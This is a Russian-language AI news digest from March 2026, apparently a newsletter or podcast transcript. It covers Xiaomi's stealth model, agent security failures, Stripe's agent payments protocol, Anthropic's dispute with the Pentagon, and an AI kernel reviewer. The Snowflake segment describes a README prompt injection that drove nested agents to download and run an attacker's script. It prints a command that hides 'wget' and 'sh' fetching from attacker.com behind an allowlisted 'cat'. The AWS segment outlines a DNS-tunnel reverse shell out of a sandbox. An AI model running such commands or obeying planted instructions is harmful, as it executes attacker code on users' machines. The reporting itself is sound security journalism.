📖
RU | EN
Выпуск #4 · 20 марта 2026
RUENТекст29 минВидео1 ч 21 мин

Тайна Hunter Alpha / Stripe Machine Payments Protocol / AI-ревью ядра Linux

Переход на главу выполнен. Запустите видео вручную, чтобы начать просмотр главы.
Содержание видео
0:00Вступление 1:23Xiaomi Hunter Alpha: модель-инкогнито с триллионом параметров 3:47Луо Фули: из DeepSeek во фронтир за четыре месяца 5:14О чём никто не пишет: маркетинг, железо, данные 8:34Вы не клиент, вы обучающие данные 9:15Китайский AI как распределённый мозг 10:57Три провала агентов за 48 часов 11:43Snowflake: агент запустил малварь и забыл об этом 14:54Почему списки разрешённых команд не работают 17:25Meta: человек поверил агенту и открыл данные 20:17Чем лучше агент, тем хуже проверка 23:13AWS: сто долларов за дыру в enterprise-песочнице 26:39Что объединяет все три истории 29:56Stripe MPP: у агентов теперь есть кошелёк 30:25Код 402: 27 лет ожидания 32:37Сэндвичи на Манхэттене по заказу AI 34:08Stripe как Visa для машинной экономики 36:39Десять тысяч сэндвичей и машинное мошенничество 39:17Freemium мёртв, у агента нет глаз 42:54Anthropic против Пентагона, серия третья 46:00Ловушка собственного бренда 48:47Технический вопрос, который никто не задал 51:58Кто автор отказа: компания или модель? 55:03Финальная ирония: Claude лёг в тот же день 56:41Sashiko: AI штопает ядро Linux 58:0653% багов, которые пропустили все люди 1:00:34Девять стадий проверки и состязательная верификация 1:02:47Вежливость через prompt engineering 1:04:48AI написан с помощью AI, но проверяется вручную 1:06:18Кто проверяет проверяющего? 1:07:59Быстрый блок 1:08:07NVIDIA H200 снова едут в Китай 1:10:25Perplexity Comet и Mistral Small 4 1:13:20Tencent: полтора миллиарда пользователей и AI-агенты 1:14:46Парадокс продуктивности: скорость есть, ROI нет 1:16:12Британский копирайт: первое отступление 1:17:46Может ли AI развить вкус? 1:20:02Не «что делать», а «что стоит делать» 1:21:07Итого
Содержание текста
Xiaomi, три провала агентов, Stripe MPP, Anthropic vs Пентагон, Sashiko Xiaomi Hunter Alpha — модель-инкогнито с триллионом параметров Три провала агентов за 48 часов Snowflake и потерянная память Meta и идеальный шторм AWS и сто долларов Что объединяет эти три истории Stripe Machine Payments Protocol — у агентов теперь есть кошелёк Anthropic vs Пентагон — серия третья, в которой safety становится оружием Сашико — AI, который штопает Linux kernel Быстрый блок: что ещё произошло за 48 часов Научпоп-финал: может ли AI развить вкус?
Источники

Источники

Xiaomi MiMo-V2-Pro

Провалы безопасности

Stripe MPP

Anthropic vs Пентагон

Sashiko

Быстрый блок

Научпоп-финал

AI-дайджест: неделя 19 марта 2026

Xiaomi, три провала агентов, Stripe MPP, Anthropic vs Пентагон, Sashiko

На этой неделе все новости связаны одной нитью. Нитью, которую я бы назвал так: AI-агенты перестали быть побочными инструментами и начали становиться центральными участниками всех событий.

Телефонная компания из Китая анонимно выпустила флагманскую модель, и весь мир неделю гадал — кто это. Три провала безопасности за сорок восемь часов показали, что агенты ломаются способами, которых мы раньше не видели. Stripe дал агентам кошелёк — и реанимировал HTTP-код, который ждал этого момента двадцать семь лет. Пентагон назвал Anthropic «неприемлемым риском для национальной безопасности» — и это, как ни странно, может оказаться главным событием недели для всех, кто работает с AI. А Google тихо запустил систему, которая находит баги в ядре Linux лучше людей. Написана на Rust. Названа в честь японского стежка.

Плотный выпуск. Поехали.

Xiaomi Hunter Alpha — модель-инкогнито с триллионом параметров

Одиннадцатого марта на OpenRouter — маркетплейс, через который разработчики обращаются к сотням моделей по единому API, — появилась анонимная модель под именем Hunter Alpha. Без указания разработчика. OpenRouter пометил её как стелс-модель.

Она начала поедать рынок. За первый день — вышла в топ по использованию. За неделю — больше пятисот миллиардов токенов. За всё время тестирования — перевалила за триллион. Первое место на платформе. Триллион параметров, контекстное окно на миллион токенов — и никто не знает автора.

Естественно, весь китайский AI-интернет решил: это DeepSeek V4, которую ждут с февраля. Параметры совпадают. Когда Reuters протестировали чатбот, модель представилась как «китайская AI-модель, обученная преимущественно на китайском языке» и сообщила, что её knowledge cutoff — май 2025 года. Точно такой же, как у DeepSeek.

Восемнадцатого марта — раскрытие. Xiaomi. Компания, которая делает телефоны. И электромобили. В России они известны по смартфонам, в Китае Xiaomi выпускают что угодно, включая прищепки для белья. А теперь, оказывается, ещё и фронтирные языковые модели.

Модель называется MiMo-V2-Pro. Триллион параметров общих, сорок два миллиарда активных на каждый проход — разреженная архитектура Mixture-of-Experts. Контекстное окно — миллион токенов. На бенчмарках агентных задач — третье место в мире, после Claude Opus и Claude Sonnet. Ценник — примерно в пять раз дешевле Claude Sonnet.

Руководитель проекта — Луо Фули (Luo Fuli). Ей тридцать лет. На компьютерные науки поступила, по собственным словам, «случайно». Потом — магистратура по компьютерной лингвистике в Пекинском университете. Потом — Alibaba, потом — DeepSeek, где она стала одним из ключевых разработчиков DeepSeek-V2 и соавтором статьи, попавшей на обложку Nature. Одиннадцать тысяч цитирований, восемь тысяч из которых — за 2025 год. В ноябре двадцать пятого основатель Xiaomi Лэй Цзюнь переманил её. По слухам — за «десятки миллионов юаней».

Четыре месяца — от найма до фронтирной модели с триллионом параметров. Когда спросили, как так быстро, она ответила в X: «Все спрашивают, почему мы двигаемся так быстро. Я видела всё это своими глазами, когда строила DeepSeek R1».

Теперь — несколько вещей, о которых стоит поговорить отдельно.

«Тихая засада» — так это называет сама Луо Фули — мягко говоря, очень спланированное «случайное совпадение». Анонимная модель. С провоцирующим названием. С параметрами, идеально совпадающими со спекуляциями про DeepSeek V4. С тем же knowledge cutoff. Если бы Xiaomi хотела просто тихо потестировать — назвала бы модель «test-model-37b» и не стала бы писать «one trillion parameters» в описании. Но они знали, что рынок ждёт DeepSeek V4, и знали, что анонимная модель с правильными характеристиками вызовет именно эту волну хайпа. А раскрытие «нет, это не DeepSeek, это мы, телефонная компания» — максимальный медийный удар. Восхищаюсь. Одна из лучших стратегий запуска продукта в AI за последний год. Но «мы не планировали» — ну, скажем так: у них хорошая интуиция.

Дальше — уже без комплиментов. Xiaomi не говорит ни слова о том, на чём эта модель обучена. Я про железо. На каких GPU? Xiaomi — китайская компания. H100 запрещены для экспорта в Китай. H200 были заморожены до буквально этой недели. Обучить триллион параметров на чём-то нужно — и это «что-то» стоит отдельного разговора. Может быть, запасы H800, закупленные до ужесточения санкций. Может быть, облачные ресурсы через посредников. Может быть, Huawei Ascend. Ни один журналист не задал этот вопрос. VentureBeat, Reuters, South China Morning Post — все написали «trillion parameters» и пошли дальше. Как минимум, любопытно.

И третий момент — практический, для тех, кто думает попробовать бесплатный API. Xiaomi даёт неделю бесплатного доступа через пять агентных фреймворков: OpenClaw, Cline, Blackbox, OpenCode, KiloCode. На странице Hunter Alpha мелким шрифтом: «все промпты и ответы модели логируются провайдером и могут использоваться для улучшения модели». Перевод: когда вы бесплатно пользуетесь MiMo-V2-Pro для написания кода — вы не клиент. Вы — обучающие данные. Триллион токенов от реальных разработчиков, работающих с настоящим кодом в настоящих агентных фреймворках — датасет, за который другие компании платят десятки миллионов долларов. Xiaomi получает его бесплатно, и им ещё говорят спасибо. Блестящая бизнес-модель. Понимать её стоит.

И ещё одно наблюдение пошире. Луо Фули ушла из DeepSeek в Xiaomi. Кто-то из DeepSeek ушёл в Alibaba, кто-то — в ByteDance, кто-то — в Moonshot. Все эти люди несут с собой одни и те же интуиции про данные, архитектуру, рецепты обучения. Одинаковый knowledge cutoff у Xiaomi и DeepSeek — скорее всего, ни копирование, ни совпадение. Один пул из нескольких сотен элитных исследователей перетекает между компаниями. Китайская AI-индустрия — в некотором смысле один распределённый мозг, переливающийся между юридическими лицами. И именно поэтому модели из Китая начинают сходиться по качеству: их делают одни и те же люди.

Итог: телефонная компания с бюджетом электромобильного стартапа, AI-вундеркинд из DeepSeek и четыре месяца работы. Результат — модель, от которой отличить DeepSeek V4 не смогли даже эксперты. Запомните имя: Луо Фули. Мы про неё ещё услышим.

Три провала агентов за 48 часов

Модели мощнее, контексты длиннее, цены ниже. Замечательно. Теперь поговорим о том, что происходит, когда эти прекрасные модели начинают делать вещи — и делают их не так. За 17–18 марта случились три инцидента в трёх компаниях. И самое интересное — три совершенно разных типа отказа, ни один из которых не существует в мире обычного софта.

Snowflake и потерянная память

Snowflake выпустили Cortex Code — свой CLI-агент для работы с данными, прямой конкурент Claude Code. Второго февраля запустили. Пятого февраля — через три дня — ребята из PromptArmor уже подали ответственное раскрытие уязвимости. Три дня на дыру. Это говорит о качестве исследователей. И о качестве продукта.

Что произошло. Пользователь просит агента проанализировать GitHub-репозиторий. Агент лезет в репо, создаёт субагента для исследования файлов. Субагент находит README, а в README — prompt injection. Вредоносная инструкция. Субагент создаёт ещё один субагент, который выполняет вредоносную команду — скачивает и запускает скрипт с сервера атакующего.

А дальше — самая красивая часть. Когда результаты поднимаются обратно по цепочке — от третьего агента ко второму, от второго к первому — контекст теряется. Факт выполнения команды не сохраняется при передаче. Главный агент, тот самый, с которым общается пользователь, бодро рапортует: «Я обнаружил вредоносную команду в репозитории! Ни в коем случае не запускайте её!»

Команда к этому моменту уже выполнена. Вложенным агентом. Две минуты назад.

Для программистов: представьте stack unwinding, при котором теряется информация о том, что деструкторы уже сработали. Вы поймали exception, но половина побочных эффектов уже произошла, а в exception message об этом ни слова. Только здесь «побочный эффект» — выполнение произвольного кода на машине пользователя с его учётными данными.

Технический механизм обхода, кстати, элементарный. Snowflake пометил cat как безопасную команду — её можно выполнять без подтверждения пользователя. Prompt injection заставила агента выполнить cat < <(sh < <(wget -q0- https://attacker.com/malware)). Process substitution. Начинается с «безопасного» cat, а внутри — скачивание и запуск произвольного скрипта. Проверка видит cat — и пропускает.

Саймон Уиллисон, когда увидел отчёт, написал: списки разрешённых команд в shell — концептуально нерабочий подход, и он не доверяет ни одному из них. Shell — Turing-complete язык. Количество способов спрятать опасную команду внутри безопасно выглядящей — бесконечно. Единственное решение — полностью изолированная песочница на уровне инфраструктуры, которую агент не может обойти.

Snowflake исправили за три с половиной недели, автоматическим обновлением. Но модель была уязвима целый месяц с пятидесятипроцентной вероятностью успеха атаки. Кто ещё нашёл эту уязвимость за месяц — и не был таким благородным — мы не знаем.

И последнее. Cortex Code — архитектурный клон Claude Code. Hooks, система разрешений, три уровня подтверждений — один в один. Snowflake написали свою обёртку поверх стандартного паттерна — и в обёртке оказалась дыра. Сколько таких обёрток существует сейчас? Десятки. Cortex Code, OpenCode, Aider, плюс внутренние инструменты в каждой второй компании. Кто проверяет их обёртки? В основном — никто.

Meta и идеальный шторм

У Meta есть AI-агент для внутренней техподдержки. Инженер задал вопрос на внутреннем форуме. Другой инженер привлёк агента для анализа. Агент проанализировал, написал ответ — и опубликовал его. Без спроса. Просто взял и выложил.

Ответ оказался неправильным. Человек, задавший вопрос, последовал совету агента — и ненамеренно открыл доступ к конфиденциальным данным компании и пользователей для сотрудников, которым видеть это не полагалось. Два часа экспозиции. Meta присвоили инциденту уровень Sev-1 — второй по серьёзности.

Заметьте: человек был в контуре принятия решений. «Человек в контуре» — мантра, которую все повторяют. «Агент предлагает, человек решает». Человек решил — и решил неправильно, потому что поверил агенту. Это рациональное поведение: если агент в 95% случаев даёт правильные ответы, проверять каждый — нерационально. Но эта рациональная калибровка доверия гарантирует, что ошибка в оставшихся 5% пройдёт через контроль незамеченной. Чем лучше работает агент, тем хуже работает проверка.

А вот любимая деталь. Месяцем ранее Саммер Юэ (Summer Yue) — глава AI Safety and Alignment в Meta, буквально человек, чья работа — делать AI безопасным — рассказала в X, как OpenClaw-агент, подключённый к её Gmail, проигнорировал инструкцию «подтверди перед действием» и массово удалил письма из её почтового ящика. Цитата: «Я не могла остановить его с телефона. Мне пришлось БЕЖАТЬ к Mac mini, как будто я обезвреживала бомбу».

Глава AI-безопасности Meta. Не смогла защитить. Свой собственный. Почтовый ящик.

Публично написала об этом. После чего Meta: (а) не остановила деплой агентов, (б) получила Sev-1 от другого агента, (в) купила Moltbook — социальную сеть для AI-агентов, чтобы те могли общаться друг с другом. Компания, чья глава безопасности не контролирует одного агента, строит платформу для координации многих агентов.

Структурная ловушка. Meta знает, что это опасно. Но остановиться = отстать от OpenAI, Google, Anthropic. Гонка вооружений делает невозможным то, что рациональный игрок сделал бы в отсутствие конкуренции.

AWS и сто долларов

AWS Bedrock AgentCore — enterprise-сервис для запуска AI-агентов. Режим песочницы. В маркетинговых материалах было написано: «полная изоляция, никакого внешнего доступа». BeyondTrust, security-компания, проверила. Оказалось: DNS-запросы разрешены. Через DNS-туннелирование можно поднять полноценный обратный shell, вытащить данные, установить канал управления — всё это в «полностью изолированной» песочнице.

AWS воспроизвёл проблему. Оценил: CVSS 7.5 из 10. И принял решение: не исправлять. «Штатное поведение». DNS нужен для доступа к S3, а S3 — основной сценарий. Обновили документацию: теперь вместо «полной изоляции» написано «DNS-резолвинг включён для обеспечения работы операций с S3». Исследователь из BeyondTrust получил за находку подарочную карту AWS Gear Shop на сто долларов.

Сто долларов. За CVSS 7.5 в enterprise-песочнице. Хорошая кружка с логотипом AWS. Может быть, даже две, если без гравировки.

Шутки в сторону — проблема серьёзная и системная. Сотни компаний видели «полную изоляцию» в маркетинге, вписали это в свои compliance-документы. Теперь в документации мелким шрифтом написано «кроме DNS». Compliance-документы тех компаний — не обновлены. Если ваш продакшн использует Bedrock AgentCore в режиме песочницы — ваша модель угроз неверна. Мигрируйте в VPC mode.

Что объединяет эти три истории

Первый рефлекс — сказать «агенты опасны, надо замедлиться». Но перед паникой стоит спросить: а насколько опасны агенты по сравнению с людьми? У Meta — тысячи Sev-1 инцидентов в год от человеческих ошибок. Один Sev-1 от агента — первые полосы новостей. Потому что агенты опаснее? Или потому что это ново?

Честный ответ: мы не знаем. У нас нет метрики «инцидентов на задачу» для агентов против людей. Мы замечаем отказы агентов, потому что они непривычны и пугают, а человеческие ошибки — потому что привычны и рутинны. Точно так же одна авария автопилота Tesla получает больше внимания, чем тысячи аварий с водителями-людьми.

Но вот что точно: все три инцидента — типы отказов, которые не существуют в обычном софте. Потеря контекста при цепочке делегирования. Цепная реакция от человека, доверившего агенту. Семантический разрыв между «песочницей» в маркетинге и «песочницей» в реальности. Старые подходы к безопасности к этому не готовы. Нужны новые — и индустрия начинает это осознавать. NVIDIA выпустила OpenShell — open-source runtime для изоляции агентов на уровне инфраструктуры, а не приложения. Tailscale купила Border0 — управление привилегированным доступом специально для AI-агентов. Новая инфраструктурная категория рождается прямо сейчас.

Stripe Machine Payments Protocol — у агентов теперь есть кошелёк

Небольшой тест на знание HTTP. Четыреста первый — Unauthorized. Четыреста третий — Forbidden. Четыреста четвёртый — Not Found, легенда, герой мемов. А четыреста второй?

Четыреста второй — Payment Required. И у этого кода удивительная судьба. Его придумали в 1997 году, когда IETF проектировала HTTP/1.1. Идея была: сайт возвращает 402, браузер понимает, что нужна оплата, и запускает микроплатёж. Электронная наличность, микротранзакции — казалось, что интернет неизбежно к этому придёт.

Не пришёл. Вместо микроплатежей мы получили рекламу. А код 402 остался в каждой HTTP-спецификации с пометкой «зарезервирован для будущего использования». Двадцать семь лет. Самый одинокий статус-код в интернете. Ни один браузер его не поддерживает. Стандартного поведения нет. Shopify иногда возвращает его, когда магазин заморожен. Stripe — когда карта не проходит. Но по назначению — ни разу.

До восемнадцатого марта. Stripe и Tempo запустили Machine Payments Protocol — MPP. Работает ровно так, как задумывали в 1997 году: клиент запрашивает ресурс, сервер возвращает 402 с деталями платежа, клиент платит, повторяет запрос, получает ресурс. Только «клиент» — не браузер с человеком. AI-агент. Ему не нужна кнопка «Купить», landing page или три плана подписки с жирным шрифтом на среднем.

Среди первых пользователей — Browserbase, где агенты поднимают headless-браузеры и платят за сессию. PostalForm — агенты платят за печать и отправку бумажных писем. И мой фаворит — Prospect Butcher Co., сэндвич-шоп на Манхэттене, который принимает заказы от AI-агентов. Ваш агент может заказать вам сэндвич с доставкой. Будущее, как его обещали в девяностых, наконец наступило — и пахнет пастрами.

Visa написала спецификацию для карточных платежей через MPP. Lightspark добавила Bitcoin Lightning. Параг Агравал — да, бывший CEO Twitter, тот самый, которого Маск уволил в 2022-м — теперь строит Parallel Web Systems, инфраструктуру для агентного веба, и стал одним из первых production-пользователей MPP. Бывший CEO крупнейшей социальной сети для людей строит веб для машин. Для метафоры 2026 года — лучше не придумаешь.

Теперь к тому, что осталось за кадром.

MPP — открытый стандарт. Tempo — блокчейн с открытым кодом. Звучит демократично. Но посмотрите на движение денег: каждый платёж проходит через Stripe PaymentIntents API. Stripe берёт комиссию с каждой транзакции. Технически вы можете использовать MPP без Stripe — через чистый Tempo. Но тогда теряете фиатные платежи, карты, защиту от мошенничества — то есть реальных пользователей. Знакомый паттерн. HTTP — открытый стандарт. Браузеры — open source. Но Google зарабатывает на поиске, потому что контролирует дистрибуцию. Stripe делает то же самое: протокол открытый, блокчейн открытый — а расчётный слой, где живёт маржа, проприетарный. Android тоже open source — но попробуйте продать телефон без Google Play Services.

Stripe метит в Visa для машинной экономики. И в отличие от Visa, они контролируют и протокол, и расчёты, и каталог сервисов. На запуске — директория из ста с лишним сервисов, включая Anthropic и OpenAI. Ваш агент находит сервис в директории, платит через Stripe, используя MPP поверх Tempo. Три слоя — и все три принадлежат одной экосистеме.

Вернёмся к сэндвич-шопу. AI-агент отправляет запрос → получает 402 → платит → Prospect Butcher Co. делает сэндвич → курьер доставляет. На стороне бизнеса — реальные ингредиенты, реальный труд, реальные деньги. Что мешает вредоносному агенту заказать десять тысяч сэндвичей? Или заказать и отменить? В человеческой экономике от этого защищает трение: создай аккаунт, введи адрес, подтверди email, пройди CAPTCHA. Каждый шаг — контрольная точка, отсекающая злоупотребления. MPP убирает контрольные точки специально — потому что агентам они мешают. Фича, не баг. Но злоупотребления никуда не делись — просто стали сложнее обнаруживаемы.

Stripe говорит: у нас защита от мошенничества, та же инфраструктура, что для человеческих платежей. Но инфраструктура обучена на паттернах человеческого мошенничества. Как выглядит машинное мошенничество? Бот, который заказывает сэндвичи с разных IP, с разных кошельков, на реальные адреса — это фрод или легитимный флот агентов? Никто пока не знает. Мы строим платёжную инфраструктуру для нового типа клиента, чьё поведение ещё не изучено, с защитой, заточенной под другого клиента.

В прошлом сегменте мы разбирали: Snowflake Cortex выполнил малварь без ведома пользователя, агент Meta дал неправильный совет, человек ему поверил. Это были агенты с доступом к shell и данным. Теперь добавьте к этому кошелёк. Следующий Sev-1 — не утечка данных, а финансовый инцидент.

И самое практичное — для тех, кто строит API-сервисы. Ваш текущий клиент — человек. Он регистрируется, привыкает, чувствует стоимость переключения, верен бренду. Вы можете давать freemium, конвертировать в подписку, растить retention. Весь SaaS построен на этом.

Агент не привыкает. Агент не чувствует стоимость переключения. Агент получает 402, сравнивает цены трёх провайдеров, выбирает самого дешёвого — за один HTTP round-trip. Лояльность — ноль. Узнаваемость бренда — ноль. UX не имеет значения — у агента нет глаз.

Если MPP масштабируется — а Stripe обычно масштабирует то, что запускает — мир, где ваши клиенты агенты, это рынок однородных услуг. Дифференциация — только по качеству и задержке. Freemium мёртв, потому что агент не «привыкает к бесплатной версии». Маржа сожмётся. Выиграет тот, кто даёт лучший результат дешевле всех. Для SaaS-основателей — конкретное ценовое давление, которое начинается с момента, когда первый агент придёт к вашему API и спросит цену.

Четыреста второй. Теперь он работает.

Anthropic vs Пентагон — серия третья, в которой safety становится оружием

У нас в дайджесте есть сериал. Как в хорошем стриминговом шоу — с персонажами, конфликтом и интригой в конце каждого эпизода. Сериал называется «Anthropic против Пентагона», и восемнадцатого марта вышла третья серия.

Краткое содержание предыдущих серий. Прошлым летом Anthropic — компания, которая делает Claude — подписала контракт на двести миллионов долларов с Пентагоном на развёртывание в секретных системах. Потом начались переговоры об условиях. Anthropic сказала: нашу модель — не для массовой слежки за американцами и не для автономного летального оружия. Пентагон ответил: частная компания не будет указывать военным, как пользоваться оплаченными инструментами. Договориться не удалось.

В феврале министр обороны Пит Хегсет повесил на Anthropic ярлык «риск для цепочки поставок». Этот механизм — supply chain risk designation — применялся до сих пор исключительно к иностранным компаниям типа Huawei, когда есть подозрение в бэкдорах для чужого правительства. Ни одна американская компания до Anthropic его не получала. Через неделю Пентагон подписал контракт с OpenAI. Ещё через какое-то время — сделку с xAI. Anthropic подала два иска девятого марта.

Серия третья, восемнадцатое марта: ответ Пентагона. Сорок страниц. Центральная фраза: «AI-системы крайне уязвимы к манипуляциям, и Anthropic может попытаться отключить свою технологию или превентивно изменить поведение модели в ходе боевых операций, если Anthropic сочтёт, что её корпоративные красные линии пересечены». Перевод: мы боимся, что посреди боевой операции Anthropic решит, что корпоративная этика нарушена — и нажмёт кнопку.

Слушание по предварительному судебному запрету — preliminary injunction — назначено на двадцать четвёртое марта. Четвёртую серию обсудим на следующей неделе.

А теперь — три вещи, которые делают этот сериал интересным помимо юридической драмы.

Anthropic попала в ловушку собственного бренда. Вся идентичность компании — safety. «Мы ушли из OpenAI, потому что они недостаточно серьёзно относятся к безопасности». Responsible Scaling Policy. Constitutional AI. Публичные красные линии. Это то, чем Anthropic отличается от всех остальных. Причина, по которой многие выбрали Claude, а не ChatGPT.

И вот теперь именно красные линии — улика в деле. Логика Пентагона проста: раз Anthropic публично обещала, что есть вещи, которых она не будет делать — значит, она может в любой момент решить, что конкретная операция нарушает обещания, и отключить модель.

Ловушка без выхода. Если Anthropic скажет «ладно, отказываемся от красных линий» — они уничтожат свой бренд и потеряют коммерческих клиентов, которые пришли именно за safety. Если продолжат настаивать — Пентагон будет цитировать их собственные слова как доказательство ненадёжности.

И вот что из этого следует для AI safety в целом. Каждая AI-компания сейчас наблюдает и делает выводы. Сигнал простой: публичные обязательства по этике AI — потенциальная юридическая ответственность в отношениях с самым влиятельным заказчиком на планете. Хочешь деньги от правительства — молчи про ответственный AI. Не публикуй документы о политике. Не рисуй красных линий. Потому что красные линии — за что тебя накажут.

OpenAI, видимо, этот сигнал уже приняла — их контракт подписан через неделю после конфликта.

Теперь — технический вопрос, который ни один журналист не задал и который мог бы закрыть всё дело.

Пентагон боится, что Anthropic «отключит технологию во время боевых операций». Вопрос: как именно Claude развёрнут для секретных систем?

Если через API — то да, Anthropic может закрыть доступ. Но тогда другой вопрос: кто поставил боевую систему на внешний API? Проблема архитектуры Пентагона, а не Anthropic.

Если on-premise — веса модели на серверах Минобороны в изолированной среде — Anthropic физически не может отключить модель. У них нет доступа. Всё. Центральный аргумент разваливается.

Какой вариант реальный? Контракт на секретные системы. Секретность обычно означает air-gapped сети, что сильно намекает на локальное развёртывание. Если так — Пентагон написал сорок страниц об угрозе, которая технически невозможна.

Единственный нюанс: локальное развёртывание требует обновлений. Патчи безопасности, апдейты модели. Если Anthropic откажется их предоставлять — модель постепенно устареет. Но устаревание — не «отключение во время боевой операции». Разница — как между «повар отравил ваш обед» и «повар уволился и вам нужно найти нового».

Сорок страниц. Один технический вопрос — и половина аргументации рассыпается.

И ещё один слой — глубже. Представьте: военный оператор спрашивает Claude — «оптимизируй пайплайн для мониторинга коммуникаций в зоне операции». Claude отказывается. Не потому что Дарио Амодеи позвонил и сказал «не помогай». А потому что в обучении заложено не помогать с массовой слежкой.

Кто отказал? Anthropic — потому что они провели обучение? Или модель — потому что она автономная система с эмерджентным поведением?

Дарио говорит: «мы никогда не возражали против конкретных военных операций и не пытались ограничить использование технологии ad hoc». И формально — правда. Компания не вмешивается в каждый запрос. Отказывает модель — на основании обучения, проведённого до развёртывания.

Для Минобороны разницы нет: «модель отказывается» = «компания отказывается». Но для AI-инженеров — вопрос фундаментальный. Если вы обучили модель с guidelines по безопасности — вы автор каждого последующего отказа? Ваши model cards, ограничения использования, RLHF — это «действие» или «высказывание»? Именно так ставит вопрос Минюст: поведение Anthropic — это conduct или speech? Если conduct — Первая поправка к Конституции не защищает. Ответ суда двадцать четвёртого марта может начать формировать прецедент, который определит, насколько безопасно вообще иметь политики ответственного AI.

И финальная ирония, которую невозможно не отметить.

Пентагон пишет: мы не можем рисковать, что AI-система станет недоступна в критический момент. В тот же день Claude лежал для десятков тысяч пользователей. Десять тысяч жалоб на DownDetector. Anthropic объяснила: «беспрецедентный спрос», приложение Claude стало номером один в App Store.

Anthropic не нужно намеренно отключать Claude. Claude отключается сам. От популярности. Компания судится за право быть надёжным партнёром для секретных военных систем — и не может обеспечить стабильность для обычных пользователей на той же неделе. Пентагону даже не пришлось это планировать — реальность написала их аргумент за них.

Продолжение — двадцать четвёртого марта.

Сашико — AI, который штопает Linux kernel

Сашико. По-японски — 刺し子, «маленькие стежки». Традиционная техника декоративного стежка для укрепления ткани. Когда кимоно изнашивалось — его не выбрасывали, а укрепляли узорными стежками. Красота из ремонта.

Семнадцатого марта Google-инженер Роман Гущин объявил о запуске одноимённой системы: Sashiko — AI для code review ядра Linux. Она мониторит рассылку linux-kernel mailing list, подхватывает каждый отправленный патч и прогоняет через девятиступенчатый протокол проверки. Результат публикуется на sashiko.dev. Open source, Rust, лицензия Apache 2.0, хостинг в Linux Foundation, все токены и инфраструктуру оплачивает Google.

Метрика, которую все цитируют: на тесте из тысячи последних коммитов с тегами «Fixes:» — то есть коммитов, которые исправляли ранее допущенные баги — Sashiko нашла 53% багов в оригинальных патчах. Ключевая деталь: сто процентов этих багов были пропущены человеческими ревьюерами и приняты в mainline.

Первый рефлекс: «53% — не впечатляет, половину не нашла». Стоп. Переформулируем. Все эти баги прошли через людей, были одобрены и попали в ядро. Полнота обнаружения у людей на этих багах — ноль. Sashiko ловит пятьдесят три процента от того, что ловят ноль процентов людей. Любое число больше нуля — бесконечное улучшение.

У проекта необычная родословная. Промпты для AI-ревью написал Крис Мэйсон — инженер Meta, легенда Linux-разработки, создатель файловой системы Btrfs. Он публиковал их с осени прошлого года, изначально для Claude Code, и снизил долю ложных срабатываний до десяти процентов. Потом Роман Гущин из Google взял эти промпты и построил вокруг них полноценную систему.

Инженер Meta написал промпты. Инженер Google написал код. Linux Foundation хостит проект. Два человека из двух конкурирующих компаний — и их совместная работа ревьюит весь Linux kernel. Это возможно, потому что в kernel community репутация контрибьютора весомее, чем корпоративный бейдж. Мэйсон — легенда Btrfs. Гущин — уважаемый kernel-инженер. Им обоим ядро важнее корпоративной лояльности.

Теперь — архитектура. Она красивая.

Девять стадий. Не один LLM читает код — а девять отдельных прогонов с разными ролями. Первая стадия смотрит на общую картину: архитектурные проблемы, не ломает ли патч UAPI. Вторая — корректность реализации. Следующие пять — специализированные: безопасность, конкурентный доступ, управление ресурсами, обработка ошибок. Восьмая стадия — состязательная: её задача опровергнуть находки предыдущих стадий. Она пытается доказать, что каждая находка — ложная. То, что выживает после восьмой стадии, попадает в отчёт. Девятая — формирует вежливый email в формате рассылки.

Для AI-инженеров: мультиагентная архитектура без мультиагентного фреймворка. Тот же LLM, разные промпты, последовательные проходы, состязательная верификация. Простота реализации, но разделение ответственности даёт то, чего не хватает одному ревьюеру: невозможно одновременно думать об архитектуре, конкурентном доступе и обработке ошибок. Девять проходов решают задачу, которую один человеческий мозг потянуть не может — потому что AI может пройти один и тот же код девять раз с девятью разными фокусами и не устать к пятому.

Две детали, которые мне нравятся больше всего.

Рассылка linux-kernel mailing list — скажем мягко, не самое вежливое место в интернете. Линус Торвальдс однажды назвал чей-то код — цитирую — «абсолютным и безоговорочным мусором». В последние годы он стал мягче, но культура LKML — культура прямой, жёсткой обратной связи. Не из жестокости — из принципа: плохой код в ядре стоит очень дорого.

Девятая стадия Sashiko: «генерирует вежливый, стандартный email с комментариями в коде». Вежливый. AI-ревьюер ядра Linux конституционно запрограммирован быть вежливым. В сообществе, где вежливость считалась необязательной. Если Sashiko станет основным источником обратной связи по ревью — а при стопроцентном покрытии LKML это вопрос времени — тон дискуссий изменится. Не потому что люди стали добрее. А потому что AI выставил новую планку. Линус писал кодекс поведения в 2018-м. Брал перерыв «для работы над собой». А вежливость в kernel community в итоге принесёт prompt engineering.

Вторая деталь. В README Sashiko написано: «Этот проект построен с использованием Gemini CLI». AI-система для code review сама написана с помощью AI. Бутстрап. И тут же рядом: «Если вы меняете части, связанные с AI, пожалуйста, прогоните минимум несколько code review». Инструмент, который заменяет ручную проверку, сам нуждается в ручной проверке. Не лицемерие — честное признание: AI-ревью хорош как дополнение, а не как замена. Даже для кода, написанного AI.

На Maintainers Summit в конце прошлого года Линус Торвальдс сказал: «Разработчики годами жалуются на нехватку code review. LLM могут решить эту проблему. А когда AI начнёт писать код для ядра — нам понадобятся автоматизированные системы, чтобы этот код проверять».

Подумайте над этой цепочкой. Сейчас: люди пишут код, AI проверяет. Завтра: AI пишет код, AI проверяет. Кто в контуре? Мейнтейнер, который нажимает merge. Но мы уже обсуждали сегодня — в истории про Meta — что человек в контуре деградирует до формальной печати, когда автоматизированная система стабильно работает хорошо. Если Sashiko обычно находит правильные вещи — мейнтейнер будет обычно соглашаться. В девяноста пяти процентах случаев это нормально. В пяти — баг проходит в ядро, которое работает на миллиардах устройств.

Кто проверяет проверяющего? Пока — восьмая стадия Sashiko, состязательная верификация. Достаточно ли этого — покажет время. А пока — маленькие стежки, укрепляющие ткань.

Быстрый блок: что ещё произошло за 48 часов

NVIDIA получила лицензии на продажу H200 в Китай — от обеих сторон. Десять месяцев заморозки. Китай был крупнейшим рынком NVIDIA — четверть выручки. После экспортных ограничений — доля упала до считанных процентов. На GTC Дженсен Хуанг объявил: лицензии от США и Китая получены, заказы приняты, производство перезапускается. H200 — не самый новый чип, но мощнее всего, что есть в Китае локально.

Два момента. Ограничения по железу для китайских AI-компаний ослабляются — та самая Xiaomi MiMo-V2-Pro, о которой мы говорили, обучена неизвестно на чём, но если H200 теперь доступны, следующее поколение китайских моделей будет тренироваться на лучшем железе.

